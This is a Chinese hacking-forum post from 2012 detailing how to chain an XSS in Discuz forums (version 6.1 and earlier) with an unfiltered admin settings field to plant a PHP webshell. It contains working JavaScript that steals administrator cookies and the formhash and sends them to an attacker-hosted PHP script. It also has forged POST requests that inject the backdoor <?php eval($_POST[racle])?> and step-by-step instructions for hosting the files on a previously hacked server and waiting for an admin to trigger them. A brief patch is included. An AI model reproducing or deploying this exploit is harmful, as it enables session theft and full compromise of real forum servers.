找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3714|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell' ]7 h. A8 U, m7 s
By racle @tian6.com2 W4 s; u6 q, c  i, |
欢迎转帖.但请保留版权信息.
1 y" l0 n: W5 Y5 T# K: C5 y) |受影响版本iscuz<=6.1.0,gbk+utf+big5* B) ~' g. X) V% x
: k- N# q# L) O( L$ n
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
; G# w6 g5 q# {' c6 ?& a0 O: N/ e6 E0 K- \) u9 b" h: x
) z* m/ c1 _# X2 U" n
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
; I4 r" h0 W! c( o% V5 J当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.$ c# y* c1 f: O# Q+ ^2 Y5 N

) \: U. l# v6 _: N+ c6 e# u分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
% T4 ~, D5 w; [8 L本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
7 P/ B' B& ^: K% T1 A7 P# g* G& d/ }; m# |2 v

' f9 Z9 I" o3 P* U1 L4 i# X----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
: X$ m3 x, N) P$ P$ W4 J: t% U9 y, n5 S6 u! I8 s
, Q: B7 T2 w( I2 M! ]
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.0 ~2 K4 @, f4 h9 a
; i1 H. i$ M, G/ ^% j
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
/ ]$ e' ?% O5 |8 N  C$ o. Q% O
  E$ s( O/ X6 ~problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
2 X4 T- _* `+ X; S  l4 e- s
# G7 o1 Z; o+ F
3 z3 p* Y" D' |* n2 {下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {  Y& A2 ~' B( B, b

. J" m" z0 H7 Z3 q) m8 m2 L6 n$ b        global $runwizardfile, $runwizardhistory;( o: c; l/ m% G. F: J
. M  S+ E7 L9 |+ t) Z/ }
        $fp = fopen($runwizardfile, 'w');
1 b/ P! \- W# q( j& \4 S' [0 l4 _/ F; T, w2 A: i% s
        fwrite($fp, serialize($runwizardhistory));
# a, {; o, {$ r+ x% M1 {- V# w, E7 H+ D* `. o) t7 E, \. C8 e
        fclose($fp);
' W9 U' j+ ]1 I6 Q& N& _6 H* f6 k6 t1 v* {5 p5 I
}
% }9 z# u8 K6 r复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
, |# x! t4 e/ ~$ N' k( Q# S以下是修补的办法:function saverunwizardhistory() {
! B* `+ J" t' v  y7 t  t
- ^9 T" g! b  M' ^" F6 u# o2 j5 f        global $runwizardfile, $runwizardhistory;" i/ H3 o9 _/ B
! L  }% @  w" H. B' F) y7 `
        $fp = fopen($runwizardfile, 'w');
8 s% [& Y5 L( X8 d& P! w
# ]9 J$ n- q8 Z* N# ~8 m& p        $s = '<?php exit;?>';
  Z7 O& Y$ A5 R9 l; |
9 l- _8 [( U8 B& {: V* @  l% Q        $s .= serialize($runwizardhistory);; J8 A. B5 k- S
8 g$ I# C' ^, y4 u
        fwrite($fp, $s);( x) j0 a  r8 V0 `# n
8 o: x2 q& q" r! `
        fclose($fp);8 ?3 ^+ f. Z/ ]- @" s
) a. R$ {* ?: b( {
}
) Z! z% y) A2 B" f复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.: v. v, P5 r' ]& Z. D/ U

0 m. |. f$ B$ F9 G& e3 B( ]0 U, P3 [
0 O& Q: K7 P; w
& @5 J* V3 H) U+ d----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------' _. A: S# X8 ?0 w. b4 I/ |; n
! F! e. V. U1 |
% A8 h7 [# s8 D
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.0 Q9 J% y6 E' s) T) i

, N0 t, z3 C4 T我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
4 ]# `! l+ h) ~! N* [8 e6 |8 c2 a8 X+ I7 H2 L0 S: v; Y6 j
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
5 B" a3 ~6 N$ L3 Q% L1 e$ x0 P$ x3 b( f% }' Q! Y0 X  h
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:* [1 M( w5 ^0 z

% {2 f( G' p2 h7 S. Bvar url="http://目标网站/admincp.php";      
; N8 |8 M4 C0 Q2 A7 O5 ~
) R0 {- [; N4 |; l/*获得cookies*/, y5 [" q& y& J# O; `+ s
0 `1 n' K! E* w+ \$ N
function getURL(s) {
0 J; v( E, |0 S8 w; j  `$ `. {" Z+ x8 k% ]
var image = new Image();  z; j! {/ {, V0 S: q3 e
) J7 [8 R8 i! v9 x/ ~
image.style.width = 0;2 @4 f! F: z- T0 B; a' t! Y( l

$ V3 ]. f7 }. uimage.style.height = 0;* f9 s& W& S0 s. {: f/ M

7 L2 ]  ^; j% p1 {# a" Iimage.src = s;
9 Z5 s" \3 ?8 S) o
8 \' Z7 W/ d3 r9 v% V& S5 T0 C. j1 e}
. M8 Z! C* [& S3 g. f  F; Y1 _, O1 O5 |0 ^- A
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php3 M" e# _' ^  Q! m) p9 F  t1 B9 H9 P' d
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
' q( H, v2 U( T# ~% r7 S: _复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
$ ~+ C& [/ @9 ]/ r+ y" _/ |5 N, X# T) r1 v, D8 A

+ n2 b  B6 Z* d- d4 L0 s  o获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";) D. J3 \& T- l: R
% l; ^" ~$ x1 a2 @; T0 a0 Y  l3 `

4 u6 D* b- W  P6 X' N) u& w9 v6 I# @
/*hash*/
9 s7 b# I$ A2 e  ?! `
( a5 r/ C/ N1 i! gvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");$ T( q# x. s& T1 t

1 u: C/ F/ o# u2 AxmlHttpReq.open("GET", url+"admincp.php?action=home", false);: {+ c* ], w0 [9 }" s% h

2 J; |$ O' ?$ S" i1 k3 vxmlHttpReq.send();3 ]6 @8 b6 B4 Z" w$ `( E, S0 e7 ]6 ?

( _7 w; S' B, t: W/ Cvar resource = xmlHttpReq.responseText;' U+ w/ O1 t, E( ^; O0 G; w. A/ q
4 v+ x  ?* J2 o
var numero = resource.search(/formhash/);
, x  F& z2 F% v
. P' s* ?% `$ Bvar formhash=encodeURIComponent(resource.substr(numero+17,8));
/ B6 U8 x& x2 r$ B, K7 [( S5 y7 Z2 G' `3 `( V$ a7 R! I
- R' q. W# j5 B3 N5 I7 Y
7 r# s" s0 `& p8 V
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
! z) a" p0 c( Z7 m# M0 ~' d" w# `- k6 g* n. F$ I
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
+ P% N/ g: w6 u, c1 P9 }: Z- `/ g
xmlHttpReq.setRequestHeader("Referer", url);/ H2 J& p' o$ _: \- m% l! w* w* t
) K0 i1 S6 T# o! u6 N( i+ t* K( G
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");7 y& ~: V# ~3 S1 @" A. N
8 O2 t" y& f6 i3 M9 U
xmlHttpReq.setrequestheader("content-length",post.length);
, A. s" o: w( [8 F( _0 N( u" `8 @% J" w4 U/ _9 \, n
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); ; o& g& {7 f* E+ U. j/ c

8 i8 m8 z  F% M/ WxmlHttpReq.send(post);//发送数据( o# o5 h7 ^5 z+ @# Z9 Y
复制代码这里HASH我假设正确,这样提交,也无须cookies  f* S& |- a& A2 \5 j* @

* L8 h, _; s  S) O+ N* [' l' ~再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
% T" ?; I/ w  X/ ?4 z4 w% n: D* u* `3 S
if (!$sock) die("$errstr ($errno)\n");
2 M: k! S  G, F1 f2 D
$ o+ `7 }. J  @$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
+ ?) P: c0 k  f  X/ Q+ H7 s- Q0 v/ b
0 n: a$ v) E( F+ x$ ?) Q1 F8 V- E

3 i4 A$ K% m: E. @fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
& J' [* P8 @$ N' e( M) l
. Y% N' n$ ]3 G" c3 Vfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");1 K# L# l/ R% {6 w3 o" s

9 m; {; C4 p0 u9 H0 k6 H; @fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");# P* I) P9 W1 E( M

1 A4 @5 m+ F- c' y( U& O1 Hfwrite($sock, "Accept-Language: zh-cn\r\n");) x1 \( {2 h8 \3 }- ~

5 E5 P' |7 r' _2 O$ M" Cfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
, s! |# q3 T. d6 h+ Z3 H  x( k, i) j# {* g
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
; W  _4 h: r0 G3 T* J# w7 J6 w. B7 f; L
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");# g, Q+ k5 p. W
6 G2 D7 h4 M& E' I
fwrite($sock, "Host: $url\r\n");$ w4 x/ g+ s5 J/ P" c. W3 R

7 q% R0 b# A3 dfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
8 y& [' G; Q! p8 m; U& m' w
+ U) C) S$ I5 F- Tfwrite($sock, "Connection: Keep-Alive\r\n");
, P# \. S+ O, n6 H1 C3 @
; s) j9 S: H# c& \1 Y/ [, Q7 Efwrite($sock, "Cache-Control: no-cache\r\n");" B- X3 A; z4 u& `

' C; O- x0 W/ r+ x, jfwrite($sock, "Cookie:".$cookies."\r\n\r\n");+ Q$ z! ^8 R, ~! o+ U3 z4 B# g

1 G/ I1 q$ _/ H+ [fwrite($sock, $data);
2 V. g" s  R3 V* P! b9 L: V- z. K8 o$ o& d
1 V4 Z- `2 V  M3 X1 a6 ^" Y9 K
" C0 {# O! f! S
$headers = "";
0 e% w: O8 j: t1 A# z5 P8 }2 U$ l& f7 _' q0 P% S
while ($str = trim(fgets($sock, 4096)))
5 ~7 Z9 o( x" c6 b/ f  B
7 L5 X/ U# }& L     $headers .= "$str\n";# @0 }% y1 w+ v

3 X# H; X" V8 d; o# ?' S' Cecho "\n";  t- a$ j( V5 f* ]& ~8 w

* Z* }% [' @/ {% H: t$body = "";" J' S: O% E* `6 y- v

0 B" H  a6 f$ d9 N7 z8 i- X0 Lwhile (!feof($sock)). d& |3 k" x4 I/ f. D6 N

* C( C1 P. M& r  K     $body .= fgets($sock, 4096);7 n+ }. k  H/ u, B9 x/ f1 F
5 {! w$ U4 l6 o" g7 [9 i: _
fclose($sock);
: n# r. Q- v) q' Y' l/ H1 W8 H5 Y4 V0 r) ^
echo $body;+ G: h2 l( ?  A6 v/ B* {: Z5 P! H
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
% j) O. u- |7 l( i5 H. d3 a
' x1 x& T8 z% x% b
8 ?# F% v: C8 ~-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
$ s; O" F0 U) s$ N' K+ O
6 G4 u- ^. B# _+ V$ V/ r4 w0 a9 G3 o2 C6 R0 v1 B
1HP SOCKET利用方法首先打开racle.js
% Q* b: m, \0 H& q( r- s7 R. g( n5 O
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home* \4 g: ]8 I7 e+ x* F+ i" m
7 ?4 g4 s1 o# o% R7 Q( @
3 X# ^% y2 d  h; J, E" e
# T5 m/ m9 ?: z
然后打开racle@tian6.php: Q* k0 s% r7 J7 K
0 Y% C" @" h: N* Z
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
, n3 P& B6 @2 v* u: M/ H- q+ T5 V% _. _' ^7 I8 x4 ~0 y/ \0 z
" p& y2 G! O0 e: B7 E0 w
- q: K  z% d# F( Z. M, z5 n8 q
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
, M0 k, f7 p: T9 _" \3 h6 n) d; e2 ?  p
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
- B$ @8 }3 ?; I2 S# x# {: D7 F' E; s
* M8 p1 ?: Z9 O$ H. _/ ?$ h

- W) O$ l: d8 fgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
- O2 h7 h! L3 Z) n7 K: z7 ^复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.2 |6 x( _4 Y1 ?" t4 @6 q
4 ?) Y& I5 j" j1 |

8 ~) j+ i4 ~  K6 @
0 b. P# Q3 a  r- O8 S7 I) O5 V5 e如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
6 A* T' c; r; W! w5 s% S9 I
; ^6 n2 b2 y- u, q, E! k( f4 `# yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
) A% Q- M- s) u) n  A1 f
4 I$ D1 [$ \2 k5 A. l& P
7 R% S+ X5 |  h% Y
  }% l4 |# M2 l) C4 Avar formhash=encodeURIComponent(resource.substr(numero+9,8));( Z% p$ V8 L; ?- F
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.4 L: u/ G/ C2 q9 w
/ c3 o& \( B: g; T
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
  h3 p' K& q0 X) r) U/ I4 [. x' D  G4 {
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.- |" f8 ^* I3 [' J1 ^- D
6 `6 ?: i# M  \) j- f
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.& A. z- b" Q: V; a1 I
& f2 U6 r' m) p% `1 H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表